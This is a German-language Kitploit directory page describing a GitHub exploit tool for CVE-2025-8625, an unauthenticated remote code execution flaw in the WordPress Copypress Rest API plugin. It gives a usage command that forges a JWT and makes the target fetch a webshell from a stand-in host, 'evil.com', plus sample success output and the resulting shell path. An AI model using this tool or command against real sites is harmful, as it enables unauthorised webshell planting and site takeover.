Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 – Fehlendes konfigurierbares JWT-Secret und Dateityp-Validierung führen zu nicht authentifizierter Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-8625
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 – Fehlendes konfigurierbares JWT-Secret und Dateityp-Validierung führen zu nicht authentifizierter Remote-Codeausführung

Repository anzeigen
2vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Fehlende konfigurierbare JWT-Secret- und Dateityp-Validierung führt zu nicht authentifizierter Remote Code Execution

🛡️ Copypress Rest API 1.1 - 1.2 RCE-Exploit

📝 Beschreibung

Das Copypress Rest API Plugin für WordPress (Versionen 1.1 bis 1.2) ist anfällig für Remote Code Execution über die Funktion copyreap_handle_image().
Das Plugin verwendet einen hartcodierten JWT-Signaturschlüssel, wenn kein Secret gesetzt ist, und validiert keine Dateitypen, wodurch nicht authentifizierte Angreifer Token fälschen und beliebige Dateien (z. B. PHP-Shells) über den Bild-Handler-Endpunkt hochladen können.

  • CVE: CVE-2025-8625
  • CVSS: 9.8 (Kritisch)

🚀 Skriptübersicht

Skriptname: CVE-2025-8625.py
Dieses Python-Skript automatisiert die Ausnutzung der Schwachstelle und ermöglicht es Ihnen, ein gültiges JWT zu generieren, eine manipulierte Anfrage zu senden und eine schädliche Datei (Webshell) auf die verwundbare WordPress-Seite hochzuladen.


⚙️ Verwendung

root@kitploit:~
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url: URL der Ziel-WordPress-Seite
  • -shell / --shell: Direkter Link zu Ihrer Webshell oder schädlichen PHP-Datei

Beispielausgabe:

root@kitploit:~
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 Funktionen

  • Generiert ein gültiges JWT mithilfe des hartcodierten Secrets des Plugins
  • Umgeht die Authentifizierung, um beliebige Dateien hochzuladen
  • Liefert eine klare Ausgabe über Erfolg/Fehlschlag der Ausnutzung
  • Einfache Befehlszeilenschnittstelle

📂 Speicherort des Shell-Uploads

Shell erfolgreich hochgeladen! 🎉
Beispiel für den Shell-Pfad:

root@kitploit:~
https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für Lehrzwecke und autorisierte Penetrationstests bestimmt.
Die Verwendung gegen Ziele ohne ausdrückliche Genehmigung ist rechtswidrig.


Von: Nxploited (Khaled Alenazi)

Tool herunterladen